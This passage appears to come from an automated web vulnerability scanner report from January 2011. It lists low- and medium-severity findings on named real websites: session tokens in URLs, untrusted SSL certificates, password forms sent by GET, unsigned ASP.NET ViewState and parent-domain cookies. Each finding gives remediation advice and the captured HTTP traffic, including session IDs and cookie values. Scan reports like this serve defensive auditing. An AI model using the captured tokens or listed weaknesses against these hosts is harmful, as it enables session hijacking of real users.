<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/delivery.jsp">Delivery Info</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Re-order</a></li>
<li><a href="/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order by item#</a>
...[SNIP]...
<li><a href="/account/myAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">My Account</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/catalogrequest/catalogRequestDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Request a Catalog</a>
...[SNIP]...
<li><a href="/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Gift & Rewards Cards</a>
...[SNIP]...
<li><a href="https://www.officedepot.com/customerservice/customerServiceDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Website Feedback</a>
...[SNIP]...
<li><a href="/customerservice/errata.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Recall Notices</a>
...[SNIP]...
<li><a href="/a/ink-toner-and-ribbons/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Ink Depot</a>
...[SNIP]...
<li><a href="/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Furniture Depot</a>
...[SNIP]...
<li><a href="/a/design-print-and-ship/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Copy & Print Depot</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/christopherlowell.jsp">Christopher Lowell</a>
...[SNIP]...
<li><a href="/a/browse/foray/N=5&cbxRefine=302020/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Foray...</a></li>
<li><a href="/catalog/AZ.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Products A-Z</a>
...[SNIP]...
<li><a href="/a/browse/your-greener-office/N=5+11332/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">GreenerOffice</a>
...[SNIP]...
<li><a href="/catalog/search.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&Ntt=office+products">Office Products</a>
...[SNIP]...
<li><a href="/a/browse/office-supplies/N=5+1676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Office Supplies</a>
...[SNIP]...
<li><a href="/a/browse/furniture/N=5+917/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Office Furniture</a>
...[SNIP]...
<li><a href="/a/browse/technology/N=5+9021/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Technology</a>
...[SNIP]...
<li><a href="/promo.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0118_product.jsp">Write a Product Review</a>
...[SNIP]...
<li><a href="/ads/displayStoreAds.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?popup=true&redirect=false" target='_blank'>Weekly Ad</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/backtoschool/5percent.jsp" target='_blank'>5% Back to Schools Program</a>
...[SNIP]...
<li><a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp">Apply for Credit Card</a>
...[SNIP]...

9.85. http://www1.whdh.com/features/articles/holiday_helping/BO144709/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144709/

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144709/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7042
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15382
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Matt Lorch</title>
<meta name="publisher" content="New Eng
...[SNIP]...
<p><a href="https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&amp;JServSessionIdr006=a3bz0okdo3.app1a" target="_blank">Order NEW 2010 recipes</a>
...[SNIP]...

9.86. http://www1.whdh.com/features/articles/holiday_helping/BO144719/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144719/

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144719/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2980
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Frances Rivera</title>
<meta name="publisher" content="New
...[SNIP]...
<p><a href="https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&amp;JServSessionIdr006=a3bz0okdo3.app1a" target="_blank">Order NEW 2010 recipes</a>
...[SNIP]...

9.87. http://www1.whdh.com/features/articles/holiday_helping/BO144727/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144727/

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144727/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7046
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Larry Ridley</title>
<meta name="publisher" content="New E
...[SNIP]...
<p><a href="https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&amp;JServSessionIdr006=a3bz0okdo3.app1a" target="_blank">Order NEW 2010 recipes</a>
...[SNIP]...

9.88. http://www1.whdh.com/features/articles/holiday_helping/BO144733/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144733/

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&JServSessionIdr006=a3bz0okdo3.app1a

Request

GET /features/articles/holiday_helping/BO144733/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15401
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Anne Allred</title>
<meta name="publisher" content="New En
...[SNIP]...
<p><a href="https://secure2.convio.net/pbwh/site/Ecommerce?store_id=2861&amp;JServSessionIdr006=a3bz0okdo3.app1a" target="_blank">Order NEW 2010 recipes</a>
...[SNIP]...

10. SSL certificate
There are 3 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



10.1. https://acc.newsguy.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:
  • The server's certificate is not trusted.
The server presented the following certificates:

Server certificate

Issued to:  acc.newsguy.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Jul 29 19:00:00 CDT 2008
Valid to:  Thu Aug 02 18:59:59 CDT 2012

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

10.2. https://billing.cloudaccess.net/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:
  • The server's certificate is not trusted.
The server presented the following certificate:

Issued to:  billing.cloudaccess.net
Issued by:  SecureTrust CA
Valid from:  Thu Feb 18 12:14:32 CST 2010
Valid to:  Fri Feb 18 12:14:32 CST 2011

10.3. https://www.cloudaccess.net/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:
  • The server's certificate is not trusted.
The server presented the following certificate:

Issued to:  www.cloudaccess.net
Issued by:  SecureTrust CA
Valid from:  Thu Feb 18 12:14:14 CST 2010
Valid to:  Fri Feb 18 12:14:14 CST 2011

11. Password field submitted using GET method
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


11.1. http://www.americascupmedia.com/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
  • http://www.americascupmedia.com/index.php
The form contains the following password field:
  • psw

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=69ffa747e74ec3fc598608ba70c8ece5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

11.2. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
  • http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
The form contains the following password field:
  • upass

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

12. ASP.NET ViewState without MAC enabled
There are 5 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


12.1. http://beta-ads.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://beta-ads.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: beta-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:30:13 GMT
Content-Length: 1402
Connection: close
Set-Cookie: A07L=CT; expires=Mon, 21-Feb-2011 22:30:13 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.2. http://p.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: p.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:46:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.3. http://r1-ads.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ACID=Bc330012940999670074; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; ROLL=v5Q2V0M9itzqEXE!;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1398


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.4. http://r1.ace.advertising.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r1.ace.advertising.com
Path:   /

Request

GET / HTTP/1.1
Host: r1.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ad
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODQwMjU1MDE5ZGQ=" />
...[SNIP]...

12.5. http://www.lynda.com/landing/softwaretraining.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lynda.com
Path:   /landing/softwaretraining.aspx

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw4CYMO; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pzpdm555fipjxc55k40s5iaj; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:43:19 GMT; path=/
X-Powered-By: ASP.NET
From: 284440-web4
Date: Tue, 25 Jan 2011 04:43:19 GMT
Connection: close
Content-Length: 24612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...

13. Cookie scoped to parent domain
There are 241 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


13.1. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/ HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 302 FOUND
Date: Mon, 24 Jan 2011 22:27:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/
Location: http://7newsboston.disqus.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


13.2. http://news.cnet.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://news.cnet.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
  • arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:25:29 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Tue, 25 Jan 2011 14:26:59 GMT
Age: 30
Content-Type: text/html; charset=UTF-8
Set-Cookie: tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
Set-Cookie: arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Thu, 24-Feb-2011 14:25:29 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=120
Keep-Alive: timeout=15, max=932
Connection: Keep-Alive
Content-Length: 84113

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Technolog
...[SNIP]...

13.3. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • session=1295919344|1295919344; path=/; domain=.mookie1.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

